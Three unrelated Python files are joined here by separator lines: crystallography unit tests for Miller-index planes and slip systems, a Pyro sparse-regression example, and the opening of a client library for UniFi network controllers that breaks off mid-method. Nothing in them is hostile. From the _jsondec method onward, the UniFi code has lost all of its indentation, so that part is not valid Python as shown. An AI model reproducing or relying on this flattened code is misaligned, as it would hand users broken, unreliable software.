        self.assertEqual(len(HklPlane.get_family('112', crystal_structure=Symmetry.cubic)), 12)
        self.assertEqual(len(HklPlane.get_family('112', crystal_structure=Symmetry.cubic, include_friedel_pairs=True)), 24)
        self.assertEqual(len(HklPlane.get_family('123', crystal_structure=Symmetry.cubic)), 24)
        self.assertEqual(len(HklPlane.get_family('123', crystal_structure=Symmetry.cubic, include_friedel_pairs=True)), 48)
        self.assertEqual(len(HklPlane.get_family('001', crystal_structure=Symmetry.tetragonal)), 1)
        self.assertEqual(len(HklPlane.get_family('001', crystal_structure=Symmetry.tetragonal, include_friedel_pairs=True)), 2)
        self.assertEqual(len(HklPlane.get_family('010', crystal_structure=Symmetry.tetragonal)), 2)
        self.assertEqual(len(HklPlane.get_family('010', crystal_structure=Symmetry.tetragonal, include_friedel_pairs=True)), 4)
        self.assertEqual(len(HklPlane.get_family('100', crystal_structure=Symmetry.tetragonal)), 2)
        self.assertEqual(len(HklPlane.get_family('100', crystal_structure=Symmetry.tetragonal, include_friedel_pairs=True)), 4)
        self.assertEqual(len(HklPlane.get_family([1, 0, 2], crystal_structure=Symmetry.tetragonal, include_friedel_pairs=True)), 8)
        self.assertEqual(len(HklPlane.get_family([-1, 0, 2], crystal_structure=Symmetry.tetragonal, include_friedel_pairs=True)), 8)
        self.assertEqual(len(HklPlane.get_family([0, 1, 2], crystal_structure=Symmetry.tetragonal, include_friedel_pairs=True)), 8)
        self.assertEqual(len(HklPlane.get_family([0, -1, 2], crystal_structure=Symmetry.tetragonal, include_friedel_pairs=True)), 8)
        self.assertEqual(len(HklPlane.get_family('001', crystal_structure=Symmetry.hexagonal)), 1)
        self.assertEqual(len(HklPlane.get_family('001', crystal_structure=Symmetry.hexagonal, include_friedel_pairs=True)), 2)
        self.assertEqual(len(HklPlane.get_family('100', crystal_structure=Symmetry.hexagonal)), 3)
        self.assertEqual(len(HklPlane.get_family('100', crystal_structure=Symmetry.hexagonal, include_friedel_pairs=True)), 6)
        self.assertEqual(len(HklPlane.get_family((1, 0, -1, 0), crystal_structure=Symmetry.hexagonal)), 3)
        self.assertEqual(len(HklPlane.get_family((1, 0, -1, 0), crystal_structure=Symmetry.hexagonal, include_friedel_pairs=True)), 6)
        self.assertEqual(len(HklPlane.get_family('102', crystal_structure=Symmetry.hexagonal)), 6)
        self.assertEqual(len(HklPlane.get_family('102', crystal_structure=Symmetry.hexagonal, include_friedel_pairs=True)), 12)
    def test_multiplicity(self):
        """Int Tables of Crystallography Vol. 1 p 32."""
        self.assertEqual(HklPlane(1, 0, 0).multiplicity(symmetry=Symmetry.cubic), 6)
        for h in range(1, 4):
            self.assertEqual(HklPlane(h, 0, 0).multiplicity(symmetry=Symmetry.tetragonal), 4)
            self.assertEqual(HklPlane(0, h, 0).multiplicity(symmetry=Symmetry.tetragonal), 4)
            self.assertEqual(HklPlane(h, h, 0).multiplicity(symmetry=Symmetry.tetragonal), 4)
            self.assertEqual(HklPlane(-h, h, 0).multiplicity(symmetry=Symmetry.tetragonal), 4)
            self.assertEqual(HklPlane(h, h, 1).multiplicity(symmetry=Symmetry.tetragonal), 8)
            self.assertEqual(HklPlane(-h, h, 1).multiplicity(symmetry=Symmetry.tetragonal), 8)
        self.assertEqual(HklPlane(0, 0, 1).multiplicity(symmetry=Symmetry.tetragonal), 2)
        self.assertEqual(HklPlane(1, 0, 2).multiplicity(symmetry=Symmetry.tetragonal), 8)
        self.assertEqual(HklPlane(-1, 0, 2).multiplicity(symmetry=Symmetry.tetragonal), 8)
        self.assertEqual(HklPlane(0, 1, 2).multiplicity(symmetry=Symmetry.tetragonal), 8)
        self.assertEqual(HklPlane(0, -1, 2).multiplicity(symmetry=Symmetry.tetragonal), 8)
        self.assertEqual(HklPlane(1, 2, 0).multiplicity(symmetry=Symmetry.tetragonal), 8)
        self.assertEqual(HklPlane(-1, 2, 0).multiplicity(symmetry=Symmetry.tetragonal), 8)
        self.assertEqual(HklPlane(1, 2, 3).multiplicity(symmetry=Symmetry.tetragonal), 16)
    def test_HklPlane_normal(self):
        """Normal of the (111) plane of tetragonal ZrO2."""
        ZrO2 = Lattice.tetragonal(3.64, 5.27)
        p = HklPlane(1, 1, 1, ZrO2)
        n = p.normal()
        self.assertAlmostEqual(n[0], 0.635, 3)
        self.assertAlmostEqual(n[1], 0.635, 3)
        self.assertAlmostEqual(n[2], 0.439, 3)
    def test_110_normal_monoclinic(self):
        """Testing (110) plane normal in monoclinic crystal structure.
        This test comes from
        http://www.mse.mtu.edu/~drjohn/my3200/stereo/sg5.html
        corrected for a few errors in the html page.
        In this test, the lattice is defined with the c-axis aligned with the Z direction of the Cartesian frame.
        """
        Mg2Si = Lattice.from_parameters(1.534, 0.405, 0.683, 90., 106., 90., x_aligned_with_a=False)
        a = Mg2Si.matrix[0]
        b = Mg2Si.matrix[1]
        c = Mg2Si.matrix[2]
        self.assertAlmostEqual(a[0], 1.475, 3)
        self.assertAlmostEqual(a[1], 0., 3)
        self.assertAlmostEqual(a[2], -0.423, 3)
        self.assertAlmostEqual(b[0], 0., 3)
        self.assertAlmostEqual(b[1], 0.405, 3)
        self.assertAlmostEqual(b[2], 0., 3)
        self.assertAlmostEqual(c[0], 0., 3)
        self.assertAlmostEqual(c[1], 0., 3)
        self.assertAlmostEqual(c[2], 0.683, 3)
        p = HklPlane(1, 1, 1, Mg2Si)
        Gc = p.scattering_vector()
        self.assertAlmostEqual(Gc[0], 1.098, 3)
        self.assertAlmostEqual(Gc[1], 2.469, 3)
        self.assertAlmostEqual(Gc[2], 1.464, 3)
        self.assertAlmostEqual(p.interplanar_spacing(), 0.325, 3)
        # projecting the scattering vector back on the direct basis recovers (h, k, l)
        Ghkl = np.dot(Mg2Si.matrix, Gc)
        self.assertEqual(Ghkl[0], 1.)  # h
        self.assertEqual(Ghkl[1], 1.)  # k
        self.assertEqual(Ghkl[2], 1.)  # l
    def test_scattering_vector(self):
        """The norm of the scattering vector is 1/d_hkl."""
        Fe_fcc = Lattice.face_centered_cubic(0.287)  # FCC iron
        hkl = HklPlane(2, 0, 0, Fe_fcc)
        Gc = hkl.scattering_vector()
        self.assertAlmostEqual(np.linalg.norm(Gc), 1 / hkl.interplanar_spacing())
        Al_fcc = Lattice.face_centered_cubic(0.405)
        hkl = HklPlane(0, 0, 2, lattice=Al_fcc)
        Gc = hkl.scattering_vector()
        self.assertAlmostEqual(np.linalg.norm(Gc), 1 / hkl.interplanar_spacing())
    def test_scattering_vector_th(self):
        """ compute the scattering vector using the formal definition and compare it with the components obtained
        using the reciprocal lattice.
        The formulae are available in the Laue Atlas p61, one typo in Eq. 6.1 was corrected. """
        (a, b, c) = self.hex._lengths
        (alpha, beta, gamma) = np.radians(self.hex._angles)
        delta = pi / 2 - gamma
        chi = gamma - atan((cos(alpha) - cos(gamma) * cos(beta)) / (cos(beta) * cos(delta)))
        epsilon = pi / 2 - acos((cos(alpha) + cos(beta)) / (cos(chi) + cos(gamma - chi)))
        psi = acos(sin(epsilon) * cos(delta + chi))
        for (hp, kp, lp) in [(1, 1, 1), [1, 2, 0]]:
            # compute the h, k, l in the Cartesian coordinate system
            h = hp / a
            k = (a / hp - b / kp * cos(gamma)) / (a / hp * b / kp * cos(delta))
            l = (lp / c - hp / a * cos(beta) - kp / b * cos(psi)) / cos(epsilon)
            Gc = HklPlane(hp, kp, lp, self.hex).scattering_vector()
            self.assertAlmostEqual(Gc[0], h, 7)
            self.assertAlmostEqual(Gc[1], k, 7)
            self.assertAlmostEqual(Gc[2], l, 7)
    def test_bragg_angle(self):
        """Bragg angle of the Fe (200) reflection at 8 keV."""
        l = Lattice.cubic(0.287)  # FCC iron
        hkl = HklPlane(2, 0, 0, l)  # 200 reflection at 8 keV is at 32.7 deg
        self.assertAlmostEqual(hkl.bragg_angle(8), 0.5704164)
    def test_4indices_representation(self):
        """Round-trip between three-index (hkl) and four-index (hkil) planes."""
        h, k, l = HklPlane.four_to_three_indices(2, -1, -1, 0)
        self.assertEqual(h, 2)
        self.assertEqual(k, -1)
        self.assertEqual(l, 0)
        h, k, l = HklPlane.four_to_three_indices(1, 0, -1, 1)
        self.assertEqual(h, 1)
        self.assertEqual(k, 0)
        self.assertEqual(l, 1)
        h, k, i, l = HklPlane.three_to_four_indices(1, 1, 1)
        self.assertEqual(h, 1)
        self.assertEqual(k, 1)
        self.assertEqual(i, -2)
        self.assertEqual(l, 1)
        h, k, i, l = HklPlane.three_to_four_indices(2, 1, 0)
        self.assertEqual(h, 2)
        self.assertEqual(k, 1)
        self.assertEqual(i, -3)
        self.assertEqual(l, 0)
class SlipSystemTests(unittest.TestCase):
    """Unit tests for the SlipSystem class."""

    def setUp(self):
        print('testing the SlipSystem class')

    def test_get_slip_system(self):
        """Both the '111' and '112' families contain 12 systems whose slip
        direction lies in the slip plane (normal . direction == 0)."""
        for family in ('111', '112'):
            systems = SlipSystem.get_slip_systems(family)
            self.assertEqual(len(systems), 12)
            for system in systems:
                plane_normal = system.get_slip_plane().normal()
                slip_direction = system.get_slip_direction().direction()
                self.assertAlmostEqual(np.dot(plane_normal, slip_direction), 0.)
# Run the whole test suite when this file is executed directly.
if __name__ == '__main__':
    unittest.main()
|
|
# Copyright (c) 2017-2019 Uber Technologies, Inc.
# SPDX-License-Identifier: Apache-2.0
import argparse
import math
import numpy as np
import torch
from torch.optim import Adam
import pyro
import pyro.distributions as dist
from pyro import poutine
from pyro.infer import Trace_ELBO
from pyro.infer.autoguide import AutoDelta, init_to_median
"""
We demonstrate how to do sparse linear regression using a variant of the
approach described in [1]. This approach is particularly suitable for situations
with many feature dimensions (large P) but not too many datapoints (small N).
In particular we consider a quadratic regressor of the form:
f(X) = constant + sum_i theta_i X_i + sum_{i<j} theta_ij X_i X_j + observation noise
Note that in order to keep the set of identified non-negligible weights theta_i
and theta_ij sparse, the model assumes the weights satisfy a 'strong hierarchy'
condition. See reference [1] for details.
Note that in contrast to [1] we do MAP estimation for the kernel hyperparameters
instead of HMC. This is not expected to be as robust as doing full Bayesian inference,
but in some regimes this works surprisingly well. For the latter HMC approach see
the NumPyro version:
https://github.com/pyro-ppl/numpyro/blob/master/examples/sparse_regression.py
References
[1] The Kernel Interaction Trick: Fast Bayesian Discovery of Pairwise
Interactions in High Dimensions.
Raj Agrawal, Jonathan H. Huggins, Brian Trippe, Tamara Broderick
https://arxiv.org/abs/1905.06501
"""
# Use CPU float32 tensors by default throughout this example.
# NOTE(review): torch.set_default_tensor_type is deprecated in recent PyTorch
# releases in favour of set_default_dtype/set_default_device -- confirm the
# torch version this example targets.
torch.set_default_tensor_type("torch.FloatTensor")
def dot(X, Z):
    """Return the matrix of pairwise inner products between rows of X and rows of Z."""
    return X.matmul(Z.t())
# The kernel that corresponds to our quadratic regressor.
def kernel(X, Z, eta1, eta2, c):
    """Evaluate the kernel induced by the quadratic regressor between the
    rows of X and the rows of Z (see reference [1])."""
    eta1sq = eta1.pow(2.0)
    eta2sq = eta2.pow(2.0)
    # the cross-product term is shared by two of the kernel components
    cross = torch.mm(X, Z.t())
    quadratic = 0.5 * eta2sq * (1.0 + cross).pow(2.0)
    correction = -0.5 * eta2sq * torch.mm(X.pow(2.0), Z.pow(2.0).t())
    linear = (eta1sq - eta2sq) * cross
    constant = c ** 2 - 0.5 * eta2sq
    return quadratic + correction + linear + constant
# Most of the model code is concerned with constructing the sparsity inducing prior.
def model(X, Y, hypers, jitter=1.0e-4):
    """Pyro model: GP regression whose kernel encodes the sparse quadratic regressor.

    :param X: (N, P) tensor of inputs
    :param Y: (N,) tensor of observed outputs
    :param hypers: dict of fixed hyperparameters (alpha1-3, beta1-2, c, expected_sparsity)
    :param jitter: small diagonal term added to the kernel for numerical stability
    """
    S, P, N = hypers["expected_sparsity"], X.size(1), X.size(0)
    # observation noise scale
    sigma = pyro.sample("sigma", dist.HalfNormal(hypers["alpha3"]))
    # global scale of the sparsity-inducing prior, tied to the expected sparsity S
    phi = sigma * (S / math.sqrt(N)) / (P - S)
    eta1 = pyro.sample("eta1", dist.HalfCauchy(phi))
    msq = pyro.sample("msq", dist.InverseGamma(hypers["alpha1"], hypers["beta1"]))
    xisq = pyro.sample("xisq", dist.InverseGamma(hypers["alpha2"], hypers["beta2"]))
    # eta2 sets the scale of the quadratic (interaction) terms
    eta2 = eta1.pow(2.0) * xisq.sqrt() / msq
    # per-dimension local scales (one HalfCauchy scale per feature)
    lam = pyro.sample(
        "lambda", dist.HalfCauchy(torch.ones(P, device=X.device)).to_event(1)
    )
    kappa = msq.sqrt() * lam / (msq + (eta1 * lam).pow(2.0)).sqrt()
    # rescale the inputs by the per-dimension scales before evaluating the kernel
    kX = kappa * X
    # compute the kernel for the given hyperparameters
    k = kernel(kX, kX, eta1, eta2, hypers["c"]) + (sigma ** 2 + jitter) * torch.eye(
        N, device=X.device
    )
    # observe the outputs Y
    pyro.sample(
        "Y",
        dist.MultivariateNormal(torch.zeros(N, device=X.device), covariance_matrix=k),
        obs=Y,
    )
"""
Here we compute the mean and variance of coefficients theta_i (where i = dimension) as well
as for quadratic coefficients theta_ij for a given (in our case MAP) estimate of the kernel
hyperparameters (eta1, xisq, ...).
Compare to theorem 5.1 in reference [1].
"""
@torch.no_grad()
def compute_posterior_stats(X, Y, msq, lam, eta1, xisq, c, sigma, jitter=1.0e-4):
    """Compute posterior means/stds of singleton and quadratic coefficients for
    fixed (MAP) kernel hyperparameters; cf. theorem 5.1 in reference [1].

    :returns: pair (numpy array of active singleton dimensions,
              list of (i, j) tuples of active quadratic dimension pairs)
    """
    N, P = X.shape
    # prepare for computation of posterior statistics for singleton weights
    # probe[i] holds the pair of unit probes +e_i / -e_i used for a central difference
    probe = torch.zeros((P, 2, P), dtype=X.dtype, device=X.device)
    probe[:, 0, :] = torch.eye(P, dtype=X.dtype, device=X.device)
    probe[:, 1, :] = -torch.eye(P, dtype=X.dtype, device=X.device)
    eta2 = eta1.pow(2.0) * xisq.sqrt() / msq
    kappa = msq.sqrt() * lam / (msq + (eta1 * lam).pow(2.0)).sqrt()
    # rescale inputs and probes by the per-dimension scales (as in the model)
    kX = kappa * X
    kprobe = kappa * probe
    kprobe = kprobe.reshape(-1, P)
    # compute various kernels
    k_xx = kernel(kX, kX, eta1, eta2, c) + (jitter + sigma ** 2) * torch.eye(
        N, dtype=X.dtype, device=X.device
    )
    k_xx_inv = torch.inverse(k_xx)
    k_probeX = kernel(kprobe, kX, eta1, eta2, c)
    k_prbprb = kernel(kprobe, kprobe, eta1, eta2, c)
    # compute mean and variance for singleton weights
    # (f(+e_i) - f(-e_i)) / 2 isolates the linear coefficient theta_i
    vec = torch.tensor([0.50, -0.50], dtype=X.dtype, device=X.device)
    mu = (
        torch.matmul(k_probeX, torch.matmul(k_xx_inv, Y).unsqueeze(-1))
        .squeeze(-1)
        .reshape(P, 2)
    )
    mu = (mu * vec).sum(-1)
    var = k_prbprb - torch.matmul(k_probeX, torch.matmul(k_xx_inv, k_probeX.t()))
    var = var.reshape(P, 2, P, 2).diagonal(dim1=-4, dim2=-2)  # 2 2 P
    std = (
        ((var * vec.unsqueeze(-1)).sum(-2) * vec.unsqueeze(-1))
        .sum(-2)
        .clamp(min=0.0)
        .sqrt()
    )
    # select active dimensions (those that are non-zero with sufficient statistical significance)
    # i.e. dimensions whose 4-sigma credible interval excludes zero
    active_dims = (((mu - 4.0 * std) > 0.0) | ((mu + 4.0 * std) < 0.0)).bool()
    active_dims = active_dims.nonzero(as_tuple=False).squeeze(-1)
    print(
        "Identified the following active dimensions:",
        active_dims.data.numpy().flatten(),
    )
    print("Mean estimate for active singleton weights:\n", mu[active_dims].data.numpy())
    # if there are 0 or 1 active dimensions there are no quadratic weights to be found
    M = len(active_dims)
    if M < 2:
        return active_dims.data.numpy(), []
    # prep for computation of posterior statistics for quadratic weights
    # enumerate all unordered pairs (i, j) with i < j of active dimensions
    left_dims, right_dims = torch.ones(M, M).triu(1).nonzero(as_tuple=False).t()
    left_dims, right_dims = active_dims[left_dims], active_dims[right_dims]
    # four probes (+-e_i +- e_j) per pair for a second-order central difference
    probe = torch.zeros(left_dims.size(0), 4, P, dtype=X.dtype, device=X.device)
    left_dims_expand = left_dims.unsqueeze(-1).expand(left_dims.size(0), P)
    right_dims_expand = right_dims.unsqueeze(-1).expand(right_dims.size(0), P)
    for dim, value in zip(range(4), [1.0, 1.0, -1.0, -1.0]):
        probe[:, dim, :].scatter_(-1, left_dims_expand, value)
    for dim, value in zip(range(4), [1.0, -1.0, 1.0, -1.0]):
        probe[:, dim, :].scatter_(-1, right_dims_expand, value)
    kprobe = kappa * probe
    kprobe = kprobe.reshape(-1, P)
    k_probeX = kernel(kprobe, kX, eta1, eta2, c)
    k_prbprb = kernel(kprobe, kprobe, eta1, eta2, c)
    # compute mean and covariance for a subset of weights theta_ij (namely those with
    # 'active' dimensions i and j)
    vec = torch.tensor([0.25, -0.25, -0.25, 0.25], dtype=X.dtype, device=X.device)
    mu = (
        torch.matmul(k_probeX, torch.matmul(k_xx_inv, Y).unsqueeze(-1))
        .squeeze(-1)
        .reshape(left_dims.size(0), 4)
    )
    mu = (mu * vec).sum(-1)
    var = k_prbprb - torch.matmul(k_probeX, torch.matmul(k_xx_inv, k_probeX.t()))
    var = var.reshape(left_dims.size(0), 4, left_dims.size(0), 4).diagonal(
        dim1=-4, dim2=-2
    )
    std = (
        ((var * vec.unsqueeze(-1)).sum(-2) * vec.unsqueeze(-1))
        .sum(-2)
        .clamp(min=0.0)
        .sqrt()
    )
    # same 4-sigma significance test, plus a magnitude floor to drop numerical noise
    active_quad_dims = (((mu - 4.0 * std) > 0.0) | ((mu + 4.0 * std) < 0.0)) & (
        mu.abs() > 1.0e-4
    ).bool()
    active_quad_dims = active_quad_dims.nonzero(as_tuple=False)
    # map pair indices back to the original feature dimensions as (i, j) tuples
    active_quadratic_dims = np.stack(
        [
            left_dims[active_quad_dims].data.numpy().flatten(),
            right_dims[active_quad_dims].data.numpy().flatten(),
        ],
        axis=1,
    )
    active_quadratic_dims = np.split(
        active_quadratic_dims, active_quadratic_dims.shape[0]
    )
    active_quadratic_dims = [tuple(a.tolist()[0]) for a in active_quadratic_dims]
    return active_dims.data.numpy(), active_quadratic_dims
# Create an artifical dataset with N datapoints and P feature dimensions. Of the P
# dimensions S will have non-zero singleton weights and Q(Q-1)/2 pairs of feature dimensions
# will have non-zero quadratic weights.
def get_data(N=20, P=10, S=2, Q=2, sigma_obs=0.15):
    """Generate a synthetic sparse-regression dataset.

    :param N: number of datapoints
    :param P: number of feature dimensions (P > 3)
    :param S: number of dimensions with non-zero singleton weights (2 <= S < P)
    :param Q: number of dimensions taking part in quadratic interactions (1 < Q <= S)
    :param sigma_obs: observation noise scale
    :returns: tuple (X, Y, rescaled singleton weights, expected quadratic dim pairs)
    """
    # BUGFIX: the precondition used to require S > 2, which the default S=2
    # violated, so get_data() with default arguments always raised. S >= 2 is
    # sufficient for the construction below.
    assert S < P and P > 3 and S >= 2 and Q > 1 and Q <= S
    # fixed seed so the dataset is reproducible across calls
    torch.manual_seed(1)
    X = torch.randn(N, P)
    # singleton weights drawn uniformly from [-1, 1)
    singleton_weights = 2.0 * torch.rand(S) - 1.0
    Y_mean = torch.einsum("ni,i->n", X[:, 0:S], singleton_weights)
    quadratic_weights = []
    expected_quad_dims = []
    for dim1 in range(Q):
        for dim2 in range(Q):
            if dim1 >= dim2:
                continue
            expected_quad_dims.append((dim1, dim2))
            quadratic_weights.append(2.0 * torch.rand(1) - 1.0)
            Y_mean += quadratic_weights[-1] * X[:, dim1] * X[:, dim2]
    # NOTE: the quadratic weights are only used to build Y_mean; the original
    # dead re-assignment `quadratic_weights = torch.tensor(quadratic_weights)`
    # (never read afterwards) has been removed.
    # we standardize the outputs Y: once before and once after adding noise
    Y = Y_mean
    Y -= Y.mean()
    Y_std1 = Y.std()
    Y /= Y_std1
    Y += sigma_obs * torch.randn(N)
    Y -= Y.mean()
    Y_std2 = Y.std()
    Y /= Y_std2
    assert X.shape == (N, P)
    assert Y.shape == (N,)
    # rescale the singleton weights so they refer to the standardized outputs
    return X, Y, singleton_weights / (Y_std1 * Y_std2), expected_quad_dims
def init_loc_fn(site):
    """Initialization strategy for the AutoDelta guide: start each latent near
    the median of its prior, with a deliberately small initial sigma."""
    value = init_to_median(site, num_samples=50)
    if site["name"] != "sigma":
        return value
    # a large initial sigma risks getting stuck in bad local optima during optimization
    return 0.1 * value
def main(args):
    """Fit the sparse regression model by MAP and report how well the recovered
    active singleton/quadratic dimensions match the generating dataset."""
    # setup hyperparameters for the model
    hypers = {
        "expected_sparsity": max(1.0, args.num_dimensions / 10),
        "alpha1": 3.0,
        "beta1": 1.0,
        "alpha2": 3.0,
        "beta2": 1.0,
        "alpha3": 1.0,
        "c": 1.0,
    }
    P = args.num_dimensions
    S = args.active_dimensions
    Q = args.quadratic_dimensions
    # generate artificial dataset
    X, Y, expected_thetas, expected_quad_dims = get_data(
        N=args.num_data, P=P, S=S, Q=Q, sigma_obs=args.sigma
    )
    loss_fn = Trace_ELBO().differentiable_loss
    # We initialize the AutoDelta guide (for MAP estimation) with args.num_restarts many
    # initial parameters sampled from the vicinity of the median of the prior distribution
    # and then continue optimizing with the best performing initialization.
    init_losses = []
    for restart in range(args.num_restarts):
        pyro.clear_param_store()
        pyro.set_rng_seed(restart)
        guide = AutoDelta(model, init_loc_fn=init_loc_fn)
        with torch.no_grad():
            init_losses.append(loss_fn(model, guide, X, Y, hypers).item())
    # re-seed with the best restart so the guide is re-initialized identically
    pyro.set_rng_seed(np.argmin(init_losses))
    pyro.clear_param_store()
    guide = AutoDelta(model, init_loc_fn=init_loc_fn)
    # Instead of using pyro.infer.SVI and pyro.optim we instead construct our own PyTorch
    # optimizer and take charge of gradient-based optimization ourselves.
    with poutine.block(), poutine.trace(param_only=True) as param_capture:
        guide(X, Y, hypers)
    params = list([pyro.param(name).unconstrained() for name in param_capture.trace])
    adam = Adam(params, lr=args.lr)
    report_frequency = 50
    print("Beginning MAP optimization...")
    # the optimization loop
    for step in range(args.num_steps):
        loss = loss_fn(model, guide, X, Y, hypers) / args.num_data
        loss.backward()
        adam.step()
        adam.zero_grad()
        # we manually reduce the learning rate according to this schedule
        if step in [100, 300, 700, 900]:
            adam.param_groups[0]["lr"] *= 0.2
        if step % report_frequency == 0 or step == args.num_steps - 1:
            print("[step %04d] loss: %.5f" % (step, loss))
    print("Expected singleton thetas:\n", expected_thetas.data.numpy())
    # we do the final computation using double precision
    median = guide.median()  # == mode for MAP inference
    active_dims, active_quad_dims = compute_posterior_stats(
        X.double(),
        Y.double(),
        median["msq"].double(),
        median["lambda"].double(),
        median["eta1"].double(),
        median["xisq"].double(),
        torch.tensor(hypers["c"]).double(),
        median["sigma"].double(),
    )
    expected_active_dims = np.arange(S).tolist()
    # true/false positives and false negatives for the singleton dimensions
    tp_singletons = len(set(active_dims) & set(expected_active_dims))
    fp_singletons = len(set(active_dims) - set(expected_active_dims))
    fn_singletons = len(set(expected_active_dims) - set(active_dims))
    singleton_stats = (tp_singletons, fp_singletons, fn_singletons)
    # same counts for the quadratic (pairwise) dimensions
    tp_quads = len(set(active_quad_dims) & set(expected_quad_dims))
    fp_quads = len(set(active_quad_dims) - set(expected_quad_dims))
    fn_quads = len(set(expected_quad_dims) - set(active_quad_dims))
    quad_stats = (tp_quads, fp_quads, fn_quads)
    # We report how well we did, i.e. did we recover the sparse set of coefficients
    # that we expected for our artificial dataset?
    print("[SUMMARY STATS]")
    print(
        "Singletons (true positive, false positive, false negative): "
        + "(%d, %d, %d)" % singleton_stats
    )
    print(
        "Quadratic (true positive, false positive, false negative): "
        + "(%d, %d, %d)" % quad_stats
    )
if __name__ == "__main__":
    # this example was written against pyro 1.7.0; other versions are untested
    assert pyro.__version__.startswith("1.7.0")
    # command-line interface for the dataset size/shape and optimizer settings
    parser = argparse.ArgumentParser(description="Krylov KIT")
    parser.add_argument("--num-data", type=int, default=750)
    parser.add_argument("--num-steps", type=int, default=1000)
    parser.add_argument("--num-dimensions", type=int, default=100)
    parser.add_argument("--num-restarts", type=int, default=10)
    parser.add_argument("--sigma", type=float, default=0.05)
    parser.add_argument("--active-dimensions", type=int, default=10)
    parser.add_argument("--quadratic-dimensions", type=int, default=5)
    parser.add_argument("--lr", type=float, default=0.3)
    args = parser.parse_args()
    main(args)
|
|
"""
Python package to interact with UniFi Controller
"""
import functools
import json
import logging
import shutil
import time
import warnings

import requests
from urllib3.exceptions import InsecureRequestWarning
"""For testing purposes:
logging.basicConfig(filename='pyunifi.log', level=logging.WARN,
format='%(asctime)s %(message)s')
""" # pylint: disable=W0105
CONS_LOG = logging.getLogger(__name__)
class APIError(Exception):
    """Raised when a controller API call fails or reports an error status."""
def retry_login(func, *args, **kwargs):  # pylint: disable=w0613
    """Decorator: if a wrapped API call fails with a requests error or an
    APIError, re-authenticate once via the controller's _login() and retry.

    Any failure (including the retry) is re-raised as APIError, chained to
    the original exception so the root cause stays visible in tracebacks.
    """
    # functools.wraps preserves the wrapped function's name/docstring so
    # logging and debugging show the real method instead of "wrapper".
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        try:
            try:
                return func(*args, **kwargs)
            except (requests.exceptions.RequestException, APIError) as err:
                CONS_LOG.warning("Failed to perform %s due to %s", func, err)
                # args[0] is the Controller instance (bound-method call).
                controller = args[0]
                controller._login()  # pylint: disable=w0212
                return func(*args, **kwargs)
        except Exception as err:
            # Chain the original exception instead of discarding it.
            raise APIError(err) from err
    return wrapper
class Controller:  # pylint: disable=R0902,R0904
    """Interact with a UniFi controller.

    Uses the JSON interface on port 8443 (HTTPS) to communicate with a UniFi
    controller. Operations will raise unifi.controller.APIError on obvious
    problems (such as login failure), but many errors (such as disconnecting a
    nonexistent client) will go unreported.

    >>> from unifi.controller import Controller
    >>> c = Controller('192.168.1.99', 'admin', 'p4ssw0rd')
    >>> for ap in c.get_aps():
    ...     print('AP named %s with MAC %s' % (ap.get('name'), ap['mac']))
    ...
    AP named Study with MAC dc:9f:db:1a:59:07
    AP named Living Room with MAC dc:9f:db:1a:59:08
    AP named Garage with MAC dc:9f:db:1a:59:0b
    """
    def __init__(  # pylint: disable=r0913
        self,
        host,
        username,
        password,
        port=8443,
        version="v5",
        site_id="default",
        ssl_verify=True,
    ):
        """
        :param host: the address of the controller host; IP or name
        :param username: the username to log in with
        :param password: the password to log in with
        :param port: the port of the controller host
        :param version: the base version of the controller API
            [v4|v5|unifiOS|UDMP-unifiOS]
        :param site_id: the site ID to connect to
        :param ssl_verify: Verify the controllers SSL certificate,
            can also be "path/to/custom_cert.pem"
        """
        self.log = logging.getLogger(__name__ + ".Controller")
        self.host = host
        # Starts empty; replaced with an X-CSRF-Token header once the
        # controller hands a token out in a response.
        self.headers = None
        self.version = version
        self.port = port
        self.username = username
        self.password = password
        self.site_id = site_id
        self.ssl_verify = ssl_verify
        # unifiOS-based controllers proxy the network app under
        # /proxy/network/; UDMP additionally uses a separate auth endpoint.
        if version == "unifiOS":
            self.url = "https://" + host + "/proxy/network/"
            self.auth_url = self.url + "api/login"
        elif version == "UDMP-unifiOS":
            self.auth_url = "https://" + host + "/api/auth/login"
            self.url = "https://" + host + "/proxy/network/"
        elif version[:1] == "v":
            # Classic software controllers: only v4 and later are supported.
            if float(version[1:]) < 4:
                raise APIError("%s controllers no longer supported" % version)
            self.url = "https://" + host + ":" + str(port) + "/"
            self.auth_url = self.url + "api/login"
        else:
            raise APIError("%s controllers no longer supported" % version)
        if ssl_verify is False:
            # Show the insecure-request warning once instead of per request.
            warnings.simplefilter("default", category=InsecureRequestWarning)
        self.log.debug("Controller for %s", self.url)
        self._login()
@staticmethod
def _jsondec(data):
obj = json.loads(data)
if "meta" in obj:
if obj["meta"]["rc"] != "ok":
raise APIError(obj["meta"]["msg"])
if "data" in obj:
result = obj["data"]
else:
result = obj
return result
def _api_url(self):
return self.url + "api/s/" + self.site_id + "/"
@retry_login
def _read(self, url, params=None):
# Try block to handle the unifi server being offline.
response = self.session.get(url, params=params, headers=self.headers)
if response.headers.get("X-CSRF-Token"):
self.headers = {"X-CSRF-Token": response.headers["X-CSRF-Token"]}
return self._jsondec(response.text)
def _api_read(self, url, params=None):
return self._read(self._api_url() + url, params)
@retry_login
def _write(self, url, params=None):
response = self.session.post(url, json=params, headers=self.headers)
if response.headers.get("X-CSRF-Token"):
self.headers = {"X-CSRF-Token": response.headers["X-CSRF-Token"]}
return self._jsondec(response.text)
def _api_write(self, url, params=None):
return self._write(self._api_url() + url, params)
@retry_login
def _update(self, url, params=None):
response = self.session.put(url, json=params, headers=self.headers)
if response.headers.get("X-CSRF-Token"):
self.headers = {"X-CSRF-Token": response.headers["X-CSRF-Token"]}
return self._jsondec(response.text)
def _api_update(self, url, params=None):
return self._update(self._api_url() + url, params)
@retry_login
def _delete(self, url, params=None):
response = self.session.delete(url, json=params, headers=self.headers)
if response.headers.get("X-CSRF-Token"):
self.headers = {"X-CSRF-Token": response.headers["X-CSRF-Token"]}
return self._jsondec(response.text)
def _api_delete(self, url, params=None):
return self._delete(self._api_url() + url, params)
def _login(self):
self.log.debug("login() as %s", self.username)
self.session = requests.Session()
self.session.verify = self.ssl_verify
response = self.session.post(
self.auth_url,
json={"username": self.username, "password": self.password},
headers=self.headers,
)
if response.headers.get("X-CSRF-Token"):
self.headers = {"X-CSRF-Token": response.headers["X-CSRF-Token"]}
if response.status_code != 200:
raise APIError(
"Login failed - status code: %i" % response.status_code
)
def _logout(self):
self.log.debug("logout()")
self._api_write("logout")
self.session.close()
def switch_site(self, name):
"""
Switch to another site
:param name: Site Name
:return: True or APIError
"""
# TODO: Not currently supported on UDMP as site support doesn't exist.
if self.version == "UDMP-unifiOS":
raise APIError(
